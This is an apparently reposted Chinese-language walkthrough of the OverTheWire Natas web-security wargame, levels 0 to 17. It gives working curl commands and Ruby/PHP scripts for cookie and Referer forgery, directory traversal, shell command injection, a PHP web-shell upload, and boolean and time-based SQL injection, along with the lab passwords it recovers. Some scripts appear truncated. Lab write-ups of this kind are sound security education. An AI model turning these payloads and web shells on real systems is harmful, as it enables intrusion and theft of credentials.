2

OverTheWire - Natas Wargame - Level 0 ~ Level 17

 3 years ago
source link: http://maskray.me/blog/2013-08-11-overthewire-natas-wargame
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

OverTheWire - Natas Wargame - Level 0 ~ Level 17

Natas Wargame是关于web安全的wargame。

Level 0

curl -su natas0:natas0 http://natas0.natas.labs.overthewire.org | grep password

Level 1

body标签使用了oncontextmenu屏蔽右键菜单,但是可以不理会继续使用curl

curl -su natas1:gtVrDuiDfck831PqWsLEZy5gyDz1clto http://natas1.natas.labs.overthewire.org

Level 2

curl -su natas2:ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi http://natas2.natas.labs.overthewire.org

看到源代码中有文件/files/pixel.png,因此访问目录/files/

curl -su natas2:ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi http://natas2.natas.labs.overthewire.org/files/

发现文件users.txt,访问得到natas3的密码。

Level 3

curl -su natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14 http://natas3.natas.labs.overthewire.org/robots.txt

发现目录/s3cr3t/,因此访问该目录:

curl -su natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14 http://natas3.natas.labs.overthewire.org/s3cr3t/
curl -su natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14 http://natas3.natas.labs.overthewire.org/s3cr3t/users.txt

Level 4

提示:Access disallowed. You are visiting from "" while authorized users should come only from "http://natas5.natas.labs.overthewire.org/"
因此用-e选项设置Referer:

curl -su natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ http://natas4.natas.labs.overthewire.org/ -e http://natas5.natas.labs.overthewire.org/

Level 5

curl -isu natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq http://natas5.natas.labs.overthewire.org

发现Set-Cookie: loggedin=0,尝试用-b指定cookie:

curl -su natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq http://natas5.natas.labs.overthewire.org -b 'loggedin=1'

Level 6

访问/index-source.html发现可疑文件includes/secret.inc,访问之得到"FOEIUWGHFEEUHOFUOIU"

curl -su natas6:aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1 -F 'secret=FOEIUWGHFEEUHOFUOIU' -F 'submit=1' http://natas6.natas.labs.overthewire.org

Level 7

可以对index.php实施directory traversal attack:

curl -su natas7:7z3hEENjQtflzgnT29q7wAvMNfZdh0i9 http://natas7.natas.labs.overthewire.org/\?page\=/etc/natas_webpass/natas8

Level 8

$encodedSecret是下面函数编码得到的:

function encodeSecret($secret) {
return bin2hex(strrev(base64_encode($secret)));
echo 3d3d516343746d4d6d6c315669563362 | xxd -p -r | rev | base64 -d

解码得到密码,然后:

curl -su natas8:DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe -F secret=oubWYf2kBq -F submit=1 http://natas8.natas.labs.overthewire.org

Level 9

curl -su natas9:W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl -F 'needle=;cat /etc/natas_webpass/natas10 #' -F submit=1 http://natas9.natas.labs.overthewire.org

Level 10

和上一关类似,但对needle的值做了过滤,不允许出现;|&三种字符。

curl -su natas10:nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu -F 'needle=. /etc/natas_webpass/natas11 #' -F submit=1 http://natas10.natas.labs.overthewire.org

Level 11

curl -Isu natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK http://natas11.natas.labs.overthewire.org

得到cookie:Set-Cookie: data=ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw%3D

根据/index-source.htmlcookie[data] xor key = tempdata,所以cookie[data] xor tempdata = key
编写如下PHP程序运行得到keyqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jq

<?php
$outText = base64_decode('ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw');
$key = json_encode(array("showpassword"=>"no", "bgcolor"=>"#ffffff"));
$in = '';
for ($i=0; $i < strlen($outText); $i++) {
$in .= $outText[$i] ^ $key[$i % strlen($key)];
echo $in;
?>

然后对代码做调整:

<?php
$outText = '';
$in = json_encode(array("showpassword"=>"yes", "bgcolor"=>"#ffffff"));
$key = 'qw8J';
for ($i=0; $i < strlen($in); $i++) {
$outText .= $in[$i] ^ $key[$i % strlen($key)];
echo base64_encode($outText);
?>

执行得到cookie,在curl里用-b设置这个cookie:

curl -su natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK -b data=ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK http://natas11.natas.labs.overthewire.org

Level 12

curl -isu natas12:EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3 -F filename=a.php -F 'uploadedfile=@-;filename=a.php' http://natas12.natas.labs.overthewire.org <<< '<?php passthru($_GET['cmd']); ?>'

上传一个简单的web shell,然后执行

curl -isu natas12:EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3 'http://natas12.natas.labs.overthewire.org/upload/vvrbw84pu0.php?cmd=cat+/etc/natas_webpass/natas13'

读取密码。

Level 13

和上一关的差别是多使用了exif_imagetype检测上传文件的类型:

else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name']))
curl -su natas13:jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY -F filename=a.php -F 'uploadedfile=@-;filename=a.php' http://natas13.natas.labs.overthewire.org <<< $'\xff\xd8\xff<?php passthru($_GET['cmd']); ?>' | grep uploaded
curl -su natas13:jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY 'http://natas13.natas.labs.overthewire.org/upload/8xr6u3ow6k.php?cmd=cat+/etc/natas_webpass/natas14'

Level 14

代码中有:

$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";

,存在SQL injection漏洞:

curl -su natas14:Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1 -F 'username=" or 1#' http://natas14.natas.labs.overthewire.org

Level 15

代码中有:

if(mysql_num_rows($res) > 0)

从服务端返回的HTML里是否有user exists可以知道注入的SQL语句返回的记录行数是否为空。可以二分搜索密码的每一位,
一般密码字符的ASCII码在33到126之间,可以用下界32表示密码结束。

require 'net/http'
Net::HTTP.start('natas15.natas.labs.overthewire.org') {|http|
1.upto(1992) {|pos|
h = 126
while l < h
m = (l + h) / 2
req = Net::HTTP::Post.new('/')
req.basic_auth 'natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'
req.body = %{username=natas16" and #{m} < ascii(mid(password,#{pos},1)) #}
res = http.request(req)
if res.body =~ /user exists/
l = m + 1
break if l == 32
print l.chr

Level 16

Level 11的升级版,现在过滤;|&`'"这几种字符了。

curl -o/dev/null -su natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh -F 'needle=$(cat /etc/natas_webpass/natas17 > /tmp/natas17)' http://natas16.natas.labs.overthewire.org

Level 9允许执行shell命令:

curl -su natas9:W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl -F 'needle=;cat /tmp/natas17 #' -F submit=1 http://natas9.natas.labs.overthewire.org

Level 17

代码和Level 15类似,但这次服务端不再提供注入的SQL返回的结果是否非空的信息了。
可以采用time-based SQL injection的方法:

curl -su natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw -F 'username=natas18" and if(ascii(mid(password,1,1)) < 128,sleep(1),1) #' http://natas17.natas.labs.overthewire.org

if语句让服务器MySQL对ascii(mid(password,1,1)) < 128求值,
若为真则sleep一秒,通过检测收到服务端返回结果的用时来得知表达式是否为真。
改变128得到二分搜索密码每个字符的代码。因为time-based注入方式执行时间较长,
考虑用多线程提速:

require 'net/http'
timeout = 2
ans = '*' * 32
worker = ->from, to {
Net::HTTP.start('natas17.natas.labs.overthewire.org') {|http|
http.read_timeout = timeout
(from...to).each {|pos|
h = 126
while l < h
m = (l + h) / 2
req = Net::HTTP::Post.new('/')
req.basic_auth 'natas17', '8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw'
req.body = %{username=natas18" and if(#{m} < ascii(mid(password,#{pos+1},1)), sleep(#{timeout}), 1) #}
begin
http.request(req)
rescue Net::ReadTimeout
l = m + 1
ans[pos] = l.chr
16.times.map {|i| Thread.new { worker[i*2, i*2+2] } }.each &:join
puts ans

得到密码:xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP

其他wargames资源

Share Comments


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK